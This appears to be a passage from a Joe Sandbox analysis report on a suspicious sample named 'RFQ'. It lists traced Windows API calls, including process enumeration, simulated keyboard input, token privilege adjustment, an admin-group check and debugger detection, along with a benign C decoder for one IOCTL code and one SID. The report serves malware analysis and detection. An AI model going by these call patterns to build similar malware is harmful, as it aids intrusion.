                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 1601658205-0
                                                                            • Opcode ID: 8e50a1cf55d7738907dc152eba89caff03d620a6bec5075773f98818983d79b6
                                                                            • Instruction ID: 617eb31a7f14595c2d916e99c038a748ef6f1fb48598308f0a35642b36286ac6
                                                                            • Opcode Fuzzy Hash: 8e50a1cf55d7738907dc152eba89caff03d620a6bec5075773f98818983d79b6
                                                                            • Instruction Fuzzy Hash: 2551BC71A00200AFDB10AF64C886F6A77E6AF45714F58819CF919AF3C2CA75AD41CBE5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 58978dc8ecc9b139e8480ea3ba19225722353dc918ea11e2cbcfa1a718ce3fa2
                                                                            • Instruction ID: 658bb67a686e9453419f945dd853302d3f63802d536e6eca57fe1b04cbe94a70
                                                                            • Opcode Fuzzy Hash: 58978dc8ecc9b139e8480ea3ba19225722353dc918ea11e2cbcfa1a718ce3fa2
                                                                            • Instruction Fuzzy Hash: 8B21D3717442108FD7219F2EC844B9A7BA5AF85350F59C06CE9459F2C2D779EC82CBE8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                            • API String ID: 0-1546025612
                                                                            • Opcode ID: a1df5dc6467b62e9675ca71ddf9a1d24eaf2d309b84ba0ddbb8563b4c500a2dd
                                                                            • Instruction ID: 78e157dae488d382eceb38f9e261d5f50cab1de5cc486154beb2ac5f6bcd5a00
                                                                            • Opcode Fuzzy Hash: a1df5dc6467b62e9675ca71ddf9a1d24eaf2d309b84ba0ddbb8563b4c500a2dd
                                                                            • Instruction Fuzzy Hash: FAA25B70A0421A8BDF24DF58C944BFDB7B3EF54314F1882AAE855A7380D7749D82CBA5
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0070A5D3
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0070A5E1
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0070A6C3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070A6D2
                                                                              • Part of subcall function 0069D5DC: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006C4062,?), ref: 0069D606
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                            • String ID:
                                                                            • API String ID: 1991900642-0
                                                                            • Opcode ID: 98aeac6130b579013b89a5c5a83034e5872437884316a357e6110fa8543eb55f
                                                                            • Instruction ID: 0a9fec7b88363bc2af92e73ab79e8a63c98ef1d0009298977c7d3795d1187605
                                                                            • Opcode Fuzzy Hash: 98aeac6130b579013b89a5c5a83034e5872437884316a357e6110fa8543eb55f
                                                                            • Instruction Fuzzy Hash: 64516BB1508300AFC750EF24C886A5BBBF9FF89754F408A2DF58597291EB74D904CB96
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 006EA9CA
                                                                            • SetKeyboardState.USER32(00000080), ref: 006EA9E6
                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 006EAA54
                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 006EAAA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 3263adb5a7866667ddfd8eb5ac6f486dea09f12d3fa7b88180031cd04579774c
                                                                            • Instruction ID: f75c24d68c7acdf4937bb64928ea37bffbe97e1b9c38b96ac0dae65627c7a3b1
                                                                            • Opcode Fuzzy Hash: 3263adb5a7866667ddfd8eb5ac6f486dea09f12d3fa7b88180031cd04579774c
                                                                            • Instruction Fuzzy Hash: 39312A70A413D8AEFF31CAAECD057FE7BA7AF44310F04822AE481522D5D374A955C76A
                                                                            APIs
                                                                            • _free.LIBCMT ref: 006BBB1F
                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • GetTimeZoneInformation.KERNEL32 ref: 006BBB31
                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,0075121C,000000FF,?,0000003F,?,?), ref: 006BBBA9
                                                                            • WideCharToMultiByte.KERNEL32(00000000,?,00751270,000000FF,?,0000003F,?,?,?,0075121C,000000FF,?,0000003F,?,?), ref: 006BBBD6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                            • String ID:
                                                                            • API String ID: 806657224-0
                                                                            • Opcode ID: b98a88d9f92619a8d8b6832377e31c366602b84c5fe78ee3e9bfaf94ee74f732
                                                                            • Instruction ID: 648a70b423b62fb9cfceb88b67f2c331faefb8ff07f4cdcb9b617f69b3f22622
                                                                            • Opcode Fuzzy Hash: b98a88d9f92619a8d8b6832377e31c366602b84c5fe78ee3e9bfaf94ee74f732
                                                                            • Instruction Fuzzy Hash: 803103B0A44245DFCB11DFA9CC809EDBBB5FF01311B1482AAE010D73A1D7B08D80CB94
                                                                            APIs
                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006FCDA7
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006FCE08
                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 006FCE1C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                            • String ID:
                                                                            • API String ID: 234945975-0
                                                                            • Opcode ID: a50ffdb81fe24bf7b2942851342233063a8868926decf32f31a3710862fc3086
                                                                            • Instruction ID: 7463876c576123506db64a4786f1db8d2e0728128dc69bcab6b2834cd5f62557
                                                                            • Opcode Fuzzy Hash: a50ffdb81fe24bf7b2942851342233063a8868926decf32f31a3710862fc3086
                                                                            • Instruction Fuzzy Hash: AD218EB194070D9BD720DFA5C948BEAB7F9EF40324F108429E64692691E774EE05CB94
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,006C5DF8), ref: 006EDAEC
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 006EDAFB
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006EDB0C
                                                                            • FindClose.KERNEL32(00000000), ref: 006EDB18
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2695905019-0
                                                                            • Opcode ID: 74d9ea3209eb2d3ab18e531f7747aa9c9070bec710cbf5d056959b65c16aed6b
                                                                            • Instruction ID: 000eb85e4ab8fc4b36f76b556281a6937d72fda3fe22c9906be5b6c9fe5288c1
                                                                            • Opcode Fuzzy Hash: 74d9ea3209eb2d3ab18e531f7747aa9c9070bec710cbf5d056959b65c16aed6b
                                                                            • Instruction Fuzzy Hash: 11F0E572451B10AB921167BCAC0D8EA37BDAE01338B10C706F835C31F0E7785DA54699
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006E8200
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($|
                                                                            • API String ID: 1659193697-1631851259
                                                                            • Opcode ID: 0cd8b78d0ff84a471d8c0cc4757bd04488eb1ce4b8c00f9644532bbd357d637a
                                                                            • Instruction ID: fd712f5f835e8305a641ef00a817665b7cec34588372339ff8db40966569ec4a
                                                                            • Opcode Fuzzy Hash: 0cd8b78d0ff84a471d8c0cc4757bd04488eb1ce4b8c00f9644532bbd357d637a
                                                                            • Instruction Fuzzy Hash: 99325774A00B459FCB28CF59C081AAAB7F1FF48710B11C56EE59ADB3A1EB70E941CB44
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F5BDF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006F5C35
                                                                            • FindClose.KERNEL32(?), ref: 006F5C7D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 821d7ca01bdfb8335388cb35aec85da0c38d3218e90993fb6cae7a0f23e9d7dd
                                                                            • Instruction ID: 71d483b2f59191f2edf3d51d67fed84407bd06e2bd518a43ea420942c1b0ba92
                                                                            • Opcode Fuzzy Hash: 821d7ca01bdfb8335388cb35aec85da0c38d3218e90993fb6cae7a0f23e9d7dd
                                                                            • Instruction Fuzzy Hash: 3D517A74604B059FC714DF28C490AAAB7E5FF4A314F14855DEA9B8B3A1CB31ED04CB91
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 006B26AA
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 006B26B4
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 006B26C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 1024de6f5b0ffdbbc4a3da153e820201abc9f4e283e07dae2d6894bd48c5d7a6
                                                                            • Instruction ID: 6b159fbcf345d2c419c3c5f6105d7fb1bc81efc3ecde61a983c4239f15cc73dd
                                                                            • Opcode Fuzzy Hash: 1024de6f5b0ffdbbc4a3da153e820201abc9f4e283e07dae2d6894bd48c5d7a6
                                                                            • Instruction Fuzzy Hash: 1F31D37494121D9BCB61DF68DC887DDBBB8AF08350F5081DAE41CA6261EB349FC58F49
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006F50F8
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006F5156
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 006F51BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: d2467f231b313b4b904fddf94ab670e70114d9c5826420cccd8cbbc5f57f476b
                                                                            • Instruction ID: db136ba7232932f4c8c082bbb9ecd46fd9e1db79515662886cc8b3d19c17bb19
                                                                            • Opcode Fuzzy Hash: d2467f231b313b4b904fddf94ab670e70114d9c5826420cccd8cbbc5f57f476b
                                                                            • Instruction Fuzzy Hash: B1314C75A00518AFDB00DF54C884BEDBBB5FF08314F088099E9059B392DB35EC56CB95
                                                                            APIs
                                                                              • Part of subcall function 0069FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 006A05E8
                                                                              • Part of subcall function 0069FD5B: __CxxThrowException@8.LIBVCRUNTIME ref: 006A0605
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                            • GetLastError.KERNEL32 ref: 006E168E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                            • String ID:
                                                                            • API String ID: 577356006-0
                                                                            • Opcode ID: 9819bd3938c338075f7631fcc0626c55f3ec59c531eb888c550aba4378b5de8d
                                                                            • Instruction ID: f6fdd08300995ac491b1e4186dfd3573e734c6a8a835585784a8a87e2196349d
                                                                            • Opcode Fuzzy Hash: 9819bd3938c338075f7631fcc0626c55f3ec59c531eb888c550aba4378b5de8d
                                                                            • Instruction Fuzzy Hash: 5A11CEB2414304AFD7189F64EC86EAAB7BDFF04710B24C52EF05697291EB70BC458A68
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006ED526
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006ED563
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006ED56E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: dbfb0c775aa8caae725df6afeb9238c4bc8f99e5d68af6d236c3008bff138357
                                                                            • Instruction ID: df195065872040c912809914ee9aa21d44bb56bf8040e73ffec70f8a3925c0ed
                                                                            • Opcode Fuzzy Hash: dbfb0c775aa8caae725df6afeb9238c4bc8f99e5d68af6d236c3008bff138357
                                                                            • Instruction Fuzzy Hash: 43115EB5E41228BFDB118F999C45FEFBBBDEB45B50F108121F914E7290D6704A058BA1
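Two of the raw constants in this trace are worth decoding by hand. The DeviceIoControl call at 006ED563 passes control code 002D1400, which is CTL_CODE(FILE_DEVICE_MASS_STORAGE 0x2D, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS), i.e. IOCTL_STORAGE_QUERY_PROPERTY; the 0xC-byte input and 0x28-byte output buffers match sizeof(STORAGE_PROPERTY_QUERY) and sizeof(STORAGE_DEVICE_DESCRIPTOR), so the function reads a drive's bus type and removable flag (consistent with an AutoIt DriveGetType helper, which is an assumption, not something the report states). The preceding CreateFileW opens the device with only FILE_READ_ATTRIBUTES (0x80), share read/write (3) and OPEN_EXISTING (3), the minimal access this IOCTL needs. Further down, the AllocateAndInitializeSid call at 006E15D0 builds a SID with two sub-authorities 0x20 and 0x220 (SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS) and hands it to CheckTokenMembership, the standard "is the caller an administrator" test. The sandbox shows the identifier-authority argument as "?"; SECURITY_NT_AUTHORITY (5) is assumed below. The following decoder is an added example, not code from the sample or from Joe Sandbox, and `trace_sid`, `ioctl_name` and the other names are illustrative choices:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the report): decode packed Win32 constants
 * as they appear in a sandbox API trace. */

/* --- DeviceIoControl control codes -----------------------------------
 * CTL_CODE layout (winioctl.h): device type in bits 31..16, required
 * access in bits 15..14, function number in bits 13..2, method in 1..0. */
#define METHOD_BUFFERED           0u
#define FILE_ANY_ACCESS           0u
#define FILE_READ_ACCESS          1u
#define FILE_DEVICE_MASS_STORAGE  0x2du

typedef struct {
    uint32_t device_type, access, function, method;
} ioctl_fields;

uint32_t ctl_code(uint32_t dev, uint32_t func, uint32_t method, uint32_t access)
{
    return (dev << 16) | (access << 14) | (func << 2) | method;
}

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xffffu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xfffu;
    f.method      = code & 0x3u;
    return f;
}

/* Names for the storage-class IOCTLs most often seen in drive-probing
 * code; NULL for anything not in this short table. */
const char *ioctl_name(uint32_t code)
{
    static const struct { uint32_t func, method, access; const char *name; } tbl[] = {
        { 0x0500, METHOD_BUFFERED, FILE_ANY_ACCESS,  "IOCTL_STORAGE_QUERY_PROPERTY" },
        { 0x0420, METHOD_BUFFERED, FILE_ANY_ACCESS,  "IOCTL_STORAGE_GET_DEVICE_NUMBER" },
        { 0x0200, METHOD_BUFFERED, FILE_READ_ACCESS, "IOCTL_STORAGE_CHECK_VERIFY" },
    };
    for (size_t i = 0; i < sizeof tbl / sizeof tbl[0]; i++)
        if (code == ctl_code(FILE_DEVICE_MASS_STORAGE, tbl[i].func, tbl[i].method, tbl[i].access))
            return tbl[i].name;
    return NULL;
}

/* --- SIDs built by AllocateAndInitializeSid --------------------------
 * String form is S-<revision>-<identifier authority>-<sub-authorities>.
 * The 48-bit authority prints in decimal when it fits in 32 bits and as
 * 0x plus 12 hex digits otherwise, matching ConvertSidToStringSid. */
int format_sid(uint64_t authority, const uint32_t *subs, int count, char *out, size_t cap)
{
    int n = (authority >> 32)
        ? snprintf(out, cap, "S-1-0x%012llX", (unsigned long long)authority)
        : snprintf(out, cap, "S-1-%llu", (unsigned long long)authority);
    for (int i = 0; i < count && n >= 0 && (size_t)n < cap; i++)
        n += snprintf(out + n, cap - (size_t)n, "-%u", subs[i]);
    return n;  /* characters written (or needed, if truncated) */
}

/* The trace's call: AllocateAndInitializeSid(?, 2, 0x20, 0x220, 0, ...).
 * Authority 5 (SECURITY_NT_AUTHORITY) is assumed; the sandbox did not
 * resolve that pointer. */
const char *trace_sid(void)
{
    static char buf[64];
    const uint32_t subs[2] = { 0x20, 0x220 };
    format_sid(5, subs, 2, buf, sizeof buf);
    return buf;
}

const char *well_known_sid_name(const char *sid)
{
    if (strcmp(sid, "S-1-5-32-544") == 0) return "BUILTIN\\Administrators";
    if (strcmp(sid, "S-1-5-32-545") == 0) return "BUILTIN\\Users";
    return NULL;
}

int main(void)
{
    ioctl_fields f = decode_ioctl(0x2D1400);
    const char *name = ioctl_name(0x2D1400);
    printf("0x2D1400 -> device 0x%X function 0x%X method %u access %u (%s)\n",
           f.device_type, f.function, f.method, f.access, name ? name : "unknown");
    printf("%s -> %s\n", trace_sid(), well_known_sid_name(trace_sid()));
    return 0;
}
```

Checking a control code this way is cheaper than memorising winioctl.h: the device-type field alone tells you whether an unknown IOCTL targets storage, a network driver or something custom, and an unexpected required-access value in a call the sandbox reports as succeeding is a hint about the handle rights the sample obtained.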
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006E15D0
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E15E5
                                                                            • FreeSid.ADVAPI32(?), ref: 006E15F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: ad833ba05d422cfb5ad1cd709215043d8dd38d57e2e8f31a070dc75b73f00225
                                                                            • Instruction ID: 333f56cdb1e281310144328a412f3aac7657aca1103ac9517e03a63381ea4367
                                                                            • Opcode Fuzzy Hash: ad833ba05d422cfb5ad1cd709215043d8dd38d57e2e8f31a070dc75b73f00225
